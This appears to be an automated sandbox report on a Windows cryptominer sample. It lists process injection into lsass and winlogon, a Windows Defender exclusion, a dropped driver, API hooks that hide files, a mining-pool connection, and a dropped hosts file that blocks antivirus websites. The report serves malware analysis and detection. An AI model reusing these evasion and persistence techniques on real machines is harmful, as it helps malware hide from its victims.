            Signatures: Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver
            Started: dialer.exe (21), powershell.exe (23), dialer.exe (25), 11 other processes (30)
          dialer.exe (14):
            Signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Contains functionality to compare user and computer (likely to detect sandboxes)
            Injected: lsass.exe (32), winlogon.exe (35), 2 other processes (41)
          powershell.exe (17):
            Signatures: Loading BitLocker PowerShell Module
            Started: conhost.exe (37)
          cmd.exe (19):
            Started: 2 other processes (43)
          dialer.exe (21):
            Signatures: Injects code into the Windows Explorer (explorer.exe); Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
            Started: 5 other processes (45)
          powershell.exe (23):
            Started: conhost.exe (39)
          dialer.exe (25):
            DNS/IP: monerooceans.stream 149.102.143.109, ports 20128, 49730, 49731, COGENT-174US United States
            Signatures: Query firmware table information (likely to detect VMs)
          13 other processes (28):
            Started: 13 other processes (47)
          11 other processes (30):
            Started: 11 other processes (49)
          lsass.exe (32):
            Signatures: Installs new ROOT certificates; Writes to foreign memory regions

          Source | Detection | Scanner | Label
          file.exe | 50% | ReversingLabs | Win64.Trojan.Generic

          Source | Detection | Scanner | Label
          C:\ProgramData\Google\Chrome\updater.exe | 50% | ReversingLabs | Win64.Trojan.Generic
          C:\Windows\Temp\jxhirqfmeznn.sys | 5% | ReversingLabs |

          No Antivirus matches

          No Antivirus matches

          Source | Detection | Scanner | Label
          http://www.digicert.c | 0% | Avira URL Cloud | safe
          http://www.digicert.cPS0~ | 0% | Avira URL Cloud | safe
          http://ocsp.msocsp. | 0% | Avira URL Cloud | safe
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          monerooceans.stream | 149.102.143.109 | true | false | | high
          gulf.moneroocean.stream | unknown | unknown | false | | high
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071949129.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735555511.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 00000024.00000002.3071949129.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735555511.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://www.digicert.c | lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.digicert.cPS0~ | lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://ocsp.msocsp. | lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                 IP | Domain | Country | ASN | ASN Name | Malicious
                                 149.102.143.109 | monerooceans.stream | United States | 174 | COGENT-174US | false
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1549101
                                Start date and time:2024-11-05 10:36:08 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 42s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                 Number of new started processes analysed:61
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:9
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.adwa.spyw.evad.mine.winEXE@87/15@1/1
                                EGA Information:
                                • Successful, ratio: 86.7%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): WmiPrvSE.exe
                                • Excluded IPs from analysis (whitelisted): 40.126.32.140, 40.126.32.138, 40.126.32.76, 20.190.160.14, 20.190.160.17, 40.126.32.133, 20.190.160.20, 20.190.160.22
                                • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Execution Graph export aborted for target file.exe, PID 6692 because it is empty
                                • Execution Graph export aborted for target updater.exe, PID 6792 because it is empty
                                 • Not all processes were analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • VT rate limit hit for: file.exe
                                 Time | Type | Description
                                 04:36:59 | API Interceptor | 1x Sleep call for process: file.exe modified
                                 04:37:01 | API Interceptor | 33x Sleep call for process: powershell.exe modified
                                 04:37:37 | API Interceptor | 489115x Sleep call for process: winlogon.exe modified
                                 04:37:38 | API Interceptor | 386738x Sleep call for process: lsass.exe modified
                                 04:37:39 | API Interceptor | 1362x Sleep call for process: svchost.exe modified
                                 04:37:41 | API Interceptor | 467487x Sleep call for process: dwm.exe modified
                                 04:37:43 | API Interceptor | 1874x Sleep call for process: dialer.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                149.102.143.109file.exeGet hashmaliciousXmrigBrowse
                                  file.exeGet hashmaliciousXmrigBrowse
                                    MenSncKnTI.exeGet hashmaliciousXmrigBrowse
                                      SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse
Match: monerooceans.stream
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Xmrig | 149.102.143.109
file.exe | malicious | Xmrig | 149.102.143.109
MenSncKnTI.exe | malicious | Xmrig | 149.102.143.109
SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | malicious | Xmrig | 149.102.143.109
MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip | malicious | Xmrig | 44.196.193.227
17ae2fbf36a41622374adfd3b1608e08.10.dr | malicious | Unknown | 44.224.209.130
SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | malicious | Xmrig | 44.196.193.227
GoogleCrashHandler.exe | malicious | Xmrig | 44.196.193.227
yljlbesdmoas.exe | malicious | Xmrig | 44.196.193.227
GoogleCrashHandler.exe | malicious | Xmrig | 44.196.193.227
Match: COGENT-174US
Associated Sample Name / URL | Detection | Threat Name | Context
DHL_IMPORT_8236820594.exe | malicious | FormBook | 154.23.184.95
ppc.elf | malicious | Mirai | 154.42.69.237
mpsl.elf | malicious | Mirai | 38.116.142.107
m68k.elf | malicious | Mirai | 38.139.147.165
spc.elf | malicious | Mirai | 38.96.22.253
mips.elf | malicious | Mirai | 38.165.211.175
sh4.elf | malicious | Mirai | 204.157.239.7
x86.elf | malicious | Mirai | 38.230.129.99
linux_arm6.elf | malicious | Chaos | 154.12.82.11
nuklear.arm.elf | malicious | Mirai, Moobot | 38.154.115.165
                                        No context
Match: C:\Windows\Temp\jxhirqfmeznn.sys
Associated Sample Name / URL | Detection | Threat Name
ICBM.exe | malicious | Xmrig
ICBM.exe | malicious | Xmrig
ahlntQUj2t.exe | malicious | Xmrig
file.exe | malicious | Xmrig
ICBM.exe | malicious | Xmrig
ICBM.exe | malicious | Xmrig
ICBM.exe | malicious | Xmrig
ICBM.exe | malicious | Xmrig
HmA7s2gaa5.exe | malicious | Xmrig
SaxP2rle4l.exe | malicious | Xmrig
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):5511168
                                                            Entropy (8bit):6.5408750151969794
                                                            Encrypted:false
                                                            SSDEEP:98304:MmWSpnQNESCZFPABbU7sfPbB3w5N0tql9QvqdNGsrySNe1bydKDMv7KKxM:MmPptSCZFPABg7Yb9uCu95DGoNrnzKKx
                                                            MD5:FB788C569D7B0ACF5546340AA85CD0A6
                                                            SHA1:DCBF06332153A462E67E27C74929AF46A5A83D39
                                                            SHA-256:D6787107B40D3D9C65B07AEA10E10FA14FF04EFBB497B6CAF5854812D8E7648B
                                                            SHA-512:0F2B1F5A2D2134DEDB6B0CBC72243AD9E0947EA4523EB2D2E848FAE9096F84C6BFCC43FFFA257412CBE363BDB535344E619E28C90601784606F915CE939DECD0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Process:C:\Windows\System32\lsass.exe
                                                            File Type:very short file (no magic)
                                                            Category:modified
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:93B885ADFE0DA089CDF634904FD59F71
                                                            SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                            SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                            SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                            Malicious:false
                                                            Preview:.
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                            Malicious:false
                                                            Preview:@...e................................................@..........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):4680
                                                            Entropy (8bit):3.711361374646048
                                                            Encrypted:false
                                                            SSDEEP:96:pYMguQII4i46h4aGdinipV9ll7UY5HAmzQ+:9A4o/xne7HO+
                                                            MD5:3ED17AE74370A242AF8BAB4EC70C7B36
                                                            SHA1:751AB462E80E14061ECE93F28F8AAA0063E5C292
                                                            SHA-256:EA3B67BBEAAF625B151A5D2AF08D0E467AA6B59085C44033FBE3FD2F48D942BE
                                                            SHA-512:72E242AD282800813106F8392D452F7477557B58AA7E072313F29BB242C7BA2FBFE2C340F9EE3564A6A5BAA7F066328760E36FA8C27F3EAB40E3BF96F5789263
                                                            Malicious:false
Preview (UTF-16 decoded):
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.6" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source>
    <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author>
    <Version>1.0</Version>
    <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description>
    <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI>
    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1510207563435464
                                                            Encrypted:false
                                                            SSDEEP:3:NlllulpvZ:NllUp
                                                            MD5:2CF7A616011ED21EE4739A0EEF5EEED8
                                                            SHA1:B8920F93FE146ED266A180393DD79273ABEDBE4C
                                                            SHA-256:6760CDB1723A97A5CC4DBDBCEA1FAFD58D52FB573FF113B60B59942E87FE89B6
                                                            SHA-512:C1F9F65566CC37C46F9BB416B9199E0B9D1BC778B56772908F7B4638AC560640DABDAC1DDCB38A5D85D91E3AA25BEEAB1F4F4A531F244E83ABF91895CA73079D
                                                            Malicious:false
                                                            Preview:@...e................................................@..........
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2748
                                                            Entropy (8bit):4.269302338623222
                                                            Encrypted:false
                                                            SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                                            MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                                            SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                                            SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                                            SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                                            Malicious:true
Preview:
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1 localhost
#	::1 localhost

0.0.0.0 avast.com
0.0.0.0 www.avast.com
0.0.0.0 totalav.com
0.0.0.0 www.totalav.com
0.0.0.0 scanguard.com
0.0.0.0 www.scanguard.com
                                                            Process:C:\ProgramData\Google\Chrome\updater.exe
                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):14544
                                                            Entropy (8bit):6.2660301556221185
                                                            Encrypted:false
                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            Joe Sandbox View:
• Filename: ICBM.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: ahlntQUj2t.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: HmA7s2gaa5.exe, Detection: malicious
• Filename: SaxP2rle4l.exe, Detection: malicious
                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Entropy (8bit):6.5408750151969794
                                                            TrID:
                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                            • DOS Executable Generic (2002/1) 0.92%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:file.exe
                                                            File size:5'511'168 bytes
MD5: fb788c569d7b0acf5546340aa85cd0a6
SHA1: dcbf06332153a462e67e27c74929af46a5a83d39
SHA256: d6787107b40d3d9c65b07aea10e10fa14ff04efbb497b6caf5854812d8e7648b
SHA512: 0f2b1f5a2d2134dedb6b0cbc72243ad9e0947ea4523eb2d2e848fae9096f84c6bfcc43fffa257412cbe363bdb535344e619e28c90601784606f915ce939decd0
SSDEEP: 98304:MmWSpnQNESCZFPABbU7sfPbB3w5N0tql9QvqdNGsrySNe1bydKDMv7KKxM:MmPptSCZFPABg7Yb9uCu95DGoNrnzKKx
TLSH: BA4623D231697F7CD8936DF8AC08A236C0E3617D97BC23957C688535D862E881D3397A
File Content Preview: MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...L.)g.........."......"....R.....@..........@..............................T...........`........................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x140001140
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x6729C44C [Tue Nov 5 07:07:56 2024 UTC]
TLS Callbacks: 0x40001760, 0x1, 0x400017e0, 0x1
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: b237ac2118704db9e7609540658f5790
Instruction (entrypoint disassembly)
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00012ED5h]
mov dword ptr [eax], 00000001h
call 00007F4004CA30AFh
nop
nop
nop
dec eax
add esp, 28h
ret
nop
inc ecx
push edi
inc ecx
push esi
push esi
push edi
push ebx
dec eax
sub esp, 20h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov edi, dword ptr [eax+08h]
dec eax
mov esi, dword ptr [00012EC9h]
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F4004CA30D0h
dec eax
cmp edi, eax
je 00007F4004CA30CBh
dec esp
mov esi, dword ptr [00016779h]
nop word ptr [eax+eax+00000000h]
mov ecx, 000003E8h
inc ecx
call esi
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F4004CA30A7h
dec eax
cmp edi, eax
jne 00007F4004CA3089h
dec eax
mov edi, dword ptr [00012E90h]
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F4004CA30AEh
mov ecx, 0000001Fh
call 00007F4004CB4E64h
jmp 00007F4004CA30C9h
cmp dword ptr [edi], 00000000h
je 00007F4004CA30ABh
mov byte ptr [00541531h], 00000001h
jmp 00007F4004CA30BBh
mov dword ptr [edi], 00000001h
dec eax
mov ecx, dword ptr [00012E7Ah]
dec eax
mov edx, dword ptr [00012E7Bh]
call 00007F4004CB4E5Bh
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F4004CA30BBh
dec eax
mov ecx, dword ptr [00012E50h]
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17608 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x549000 | 0x390 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x546000 | 0x198 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54a000 | 0x78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x140a0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x14410 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x177c0 | 0x178 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x12156 | 0x12200 | 6377790a0c479e542049c6368ae704f9 | False | 0.4525053879310345 | data | 6.176862580587811 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x14000 | 0x3dfc | 0x3e00 | 83ac305b6a96aa94897a04049bb8ba85 | False | 0.5096396169354839 | data | 5.132348642661844 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x18000 | 0x52d4b8 | 0x52a800 | 03a5c7073619ce02d1bd18f9ec32f256 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x546000 | 0x198 | 0x200 | d2f019686ca09662fd14bcc140313ab3 | False | 0.529296875 | data | 3.617058043954178 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg | 0x547000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x548000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x549000 | 0x390 | 0x400 | 0dd02af6ec781894019ac3fdb5cbf63f | False | 0.384765625 | data | 2.998554535660332 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x54a000 | 0x78 | 0x200 | a39919fdf7b33c1123ed7bed1fd77dde | False | 0.23828125 | data | 1.4899261113070796 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x549060 | 0x32c | data | English | United States | 0.4396551724137931
Imports:
DLL | Import
msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strcat, strcpy, strlen, strncmp, strstr, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Language of compilation system | Country where language is spoken | Map
English | United States |
IDS alerts:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-05T10:37:17.785545+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 49732 | TCP
2024-11-05T10:37:55.685944+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 49743 | TCP
TCP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 10:37:09.455450058 CET | 51135 | 53 | 192.168.2.4 | 1.1.1.1
Nov 5, 2024 10:37:09.463340044 CET | 53 | 51135 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 5, 2024 10:37:09.455450058 CET | 192.168.2.4 | 1.1.1.1 | 0xbba1 | Standard query (0) | gulf.moneroocean.stream | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 5, 2024 10:37:09.463340044 CET | 1.1.1.1 | 192.168.2.4 | 0xbba1 | No error (0) | gulf.moneroocean.stream | monerooceans.stream | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 10:37:09.463340044 CET | 1.1.1.1 | 192.168.2.4 | 0xbba1 | No error (0) | monerooceans.stream | - | 149.102.143.109 | A (IP address) | IN (0x0001) | false

                                                            Code Manipulations

Function Name                   Hook Type   Active in Processes
ZwEnumerateKey                  INLINE      explorer.exe, winlogon.exe
NtQuerySystemInformation        INLINE      explorer.exe, winlogon.exe
ZwResumeThread                  INLINE      explorer.exe, winlogon.exe
NtDeviceIoControlFile           INLINE      explorer.exe, winlogon.exe
ZwDeviceIoControlFile           INLINE      explorer.exe, winlogon.exe
NtEnumerateKey                  INLINE      explorer.exe, winlogon.exe
NtQueryDirectoryFile            INLINE      explorer.exe, winlogon.exe
ZwEnumerateValueKey             INLINE      explorer.exe, winlogon.exe
ZwQuerySystemInformation        INLINE      explorer.exe, winlogon.exe
NtResumeThread                  INLINE      explorer.exe, winlogon.exe
RtlGetNativeSystemInformation   INLINE      explorer.exe, winlogon.exe
NtQueryDirectoryFileEx          INLINE      explorer.exe, winlogon.exe
NtEnumerateValueKey             INLINE      explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx          INLINE      explorer.exe, winlogon.exe
ZwQueryDirectoryFile            INLINE      explorer.exe, winlogon.exe
Function Name                   Hook Type   New Data
ZwEnumerateKey                  INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation        INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                  INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile           INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile           INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                  INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile            INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF
